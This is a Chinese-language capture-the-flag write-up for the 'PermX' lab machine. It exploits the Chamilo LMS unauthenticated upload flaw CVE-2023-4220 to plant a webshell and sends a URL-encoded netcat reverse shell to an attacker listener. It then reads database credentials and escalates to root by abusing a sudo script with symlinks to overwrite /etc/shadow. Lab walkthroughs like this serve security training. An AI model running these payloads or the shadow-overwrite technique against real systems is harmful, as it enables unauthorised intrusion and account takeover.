PermX WriteUp

PermX WriteUp

0x01 信息收集

1. nmap 端口扫描

发现目标开放80和22端口

2. 将域名添加到hosts文件，用浏览器访问，探测网站功能点
   

3. 对目标进行目录扫描和子域名扫描

# 子域名扫描
ffuf -c -u 'http://permx.htb' -H 'host: FUZZ.permx.htb' -w /usr/share/wordlists/dnsmap.txt -fc 301,302 -mc all

# 目录扫描
dirsearch -u http://permx.htb

通过ffuf可以发现目标存在 lms及www两个子域名，将这两个子域名添加到hosts文件

目录扫描结果如下：

经过查看网页页面可以发现该网站是一个学习网站，用于报名一些网上课程等。

4. 访问之前发现的子域名lms.permx.htb

5. 可以发现此网站是一个Chamilo框架的界面

Chamilo是一款免费的开源LMS，支持设计和进行远程课程在线培训项目。此外，许多教育工作者选择Chamilo来进行现场培训课程。Chamilo安全可靠，可提供50多种语言版本

搜索chamilo历史漏洞发现目标最近爆出的漏洞是CVE-2023-4220

https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc

阅读文章后，发现其存在的是未经身份认证的文件上传漏洞，存在于/main/inc/lib/javascript/bigupload/inc/bigUpload.php文件

6. 安装配置利用工具

下载利用工具：
git clone https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc.git
切换到工具目录下安装所需python拓展
pip3 install -r requirements.txt

0x02 漏洞利用

1. 尝试访问**/main/inc/lib/javascript/bigupload/files/**端点来检查目标是否存在该漏洞

python3 ./main.py -u http://lms.permx.htb/ -a scan

2. 在目标中创建PHP Webshell文件

python3 ./main.py -u http://lms.permx.htb/ -a webshell

3. 将shell反弹到kali

kali开启监听：
nc -lvvp 4444
目标访问上传的webshell执行反弹shell的命令：
http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/webshell.php?cmd=%6d%6b%6e%6f%64%20%62%61%63%6b%70%69%70%65%20%70%20%26%26%20%6e%63%20%31%30%2e%31%30%2e%31%36%2e%33%36%20%34%34%34%34%20%30%3c%62%61%63%6b%70%69%70%65%20%7c%20%2f%62%69%6e%2f%62%61%73%68%20%31%3e%62%61%63%6b%70%69%70%65%20
// 由于是get请求 所以反弹shell命令需要url编码

4. 使用python返回一个稳定的shell

python3 -c "import pty;pty.spawn('/bin/bash')"

经过测试后发现www-data用户不存在能够执行其他提权命令的权限，考虑是否存在信息泄露方面的点

5. 敏感信息收集

在lms子域的源码中，发现存在着chamilo框架的配置文件 app/config/configuration.php

在配置文件中发现数据库用户名密码

chamilo:03F6lY3uXAP2bkW8

查看本地端口开放状况发现3306端口开放

6. 尝试连接数据库,收集数据库中敏感数据

mysql -u chamilo -p

收集数据库中数据可以发现数据库user表中存在两个用户admin和anon

得到两组用户名密码

admin:$2y$04$1Ddsofn9mOaa9cbPzk0m6euWcainR.ZT2ts96vRCKrN7CGCmmq4ra
anon:$2y$04$wyjp2UVTeiD/jF4OdoYDquf4e7OWi6a3sohKRDe80IHAyihX0ujdS
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$04$1Ddsofn9mOaa9cbPzk0m6euWcainR.ZT2ts96vRCKrN7CGCmmq4ra |
| anon     | $2y$04$wyjp2UVTeiD/jF4OdoYDquf4e7OWi6a3sohKRDe80IHAyihX0ujdS 

查找/etc/passwd文件可以发现只有root、mtz用户可以登录系统

7. 尝试获取普通用户权限

尝试使用上面找到的密码登录mtz用户

测试发现数据表中的密码是加密之后存储的，并且hashcat解密比较麻烦，这里的mtz用户使用的是数据库的密码。

0x03 获取第一个flag

以mtz用户身份登陆后，回到家目录可以拿到第一个flag

0x04 获取第二个flag

1. 上传linux提权辅助脚本

kali开启web服务器
python3 -m http.server
目标使用wget下载linux-smart-enumeration.sh
wget http://ip:8000/linux-smart-enumeration.sh

2. 使用linux-smart-enumeration.sh扫描

发现当前用户能够以root身份运行/opt/acl.sh脚本

3. 查看/opt/acl.sh文件作用

分析代码，发现其主要功能是更改文件所有权限，但是要求必须在/home/mtz目录下，并且目标路径中不能使用"." 及"…"

查看/home/mtz目录下存在的文件

4. 符号链接攻击提权

根据/opt/acl.sh文件，可以修改位于/home/mtz文件夹下的所有文件权限，那么可以符号链接将根目录映射到mtz下来执行攻击

这里可以将根目录的所有文件通过符号链接映射到mtz文件夹内，这样我们可以修改任意一个文件的权限，可以修改shadow文件，通过重写密码的方式获得root权限。

注意： 隔一段时间符号链接脚本以及文件权限会被重置，需要重新运行命令。

现在我们具有对shadow文件的更改权限，那么可以重新生成一段密码为Aa123456的密码，然后将之前的密码覆盖。

openssl passwd -6 Aa123456   // 生成密码的散列值

在openssl命令中，-6选项与passwd子命令一起使用时，用于生成使用SHA-512算法的密码散列。这个命令通常用于生成或验证与Linux系统上的/etc/shadow文件或其他密码存储系统兼容的密码散列

echo 'root:$6$jIt.q/grzXdSs/Gh$39JJtmaRPRzDSj9Pa6Y2x7n.NkqaUqg1FpGQt5GPQk0wOsWQ1BPzvl0R0ETtHF86mRBn5H5Cc94XgjYeOXBEj1:19742:0:99999:7:::' > /etc/shadow 			// 覆盖掉之前的root密码

5. 此时root密码已经被更改为Aa123456，直接登录可以在root家目录中获取第二个flag